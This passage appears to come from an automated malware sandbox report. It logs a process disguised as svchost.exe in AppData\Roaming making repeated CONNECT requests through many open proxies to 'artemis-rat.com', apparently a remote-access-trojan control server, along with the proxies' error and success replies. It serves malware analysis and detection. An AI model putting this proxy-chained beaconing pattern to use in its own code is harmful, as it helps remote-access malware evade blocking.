                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3270192.168.2.560009209.222.97.306254343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.010870934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3271192.168.2.559083103.184.19.122312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.011904955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.145850897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3272192.168.2.555520195.177.217.1315285843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.011905909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.373888016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3273192.168.2.560470159.223.166.214746043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.014146090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.677243948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.374583006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.846276045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3274192.168.2.560543172.67.181.378043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.016007900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.170198917 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3275192.168.2.5604598.219.179.2371567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.018940926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3276192.168.2.555575201.184.159.28567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.044235945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3277192.168.2.555525203.202.253.108502043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.087037086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.145982027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3278192.168.2.56039742.49.148.167900143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.087202072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.495260000 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3279192.168.2.560579172.64.152.988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.100330114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.254961014 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3280192.168.2.560407103.120.6.468043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.100430012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.481816053 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3281192.168.2.560585104.19.124.1128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.120100021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.274369955 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3282192.168.2.560462185.110.190.998043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.120270014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3283192.168.2.560589104.24.15.1588043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.120290995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.274626017 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3284192.168.2.56055338.162.8.226312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.120323896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.554040909 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3285192.168.2.560435106.105.218.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.120471954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.942830086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3286192.168.2.56046145.11.95.165521943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.126411915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3287192.168.2.560558191.102.160.157312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.126586914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.349069118 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3288192.168.2.56003772.49.49.113103443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.126688957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3289192.168.2.555632159.223.71.715161643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.136769056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3290192.168.2.56005850.63.12.333464443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.137136936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3291192.168.2.56006527.65.240.157108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.141158104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3292192.168.2.560541181.204.184.12299943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.141546011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.833437920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.833650112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.311177015 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
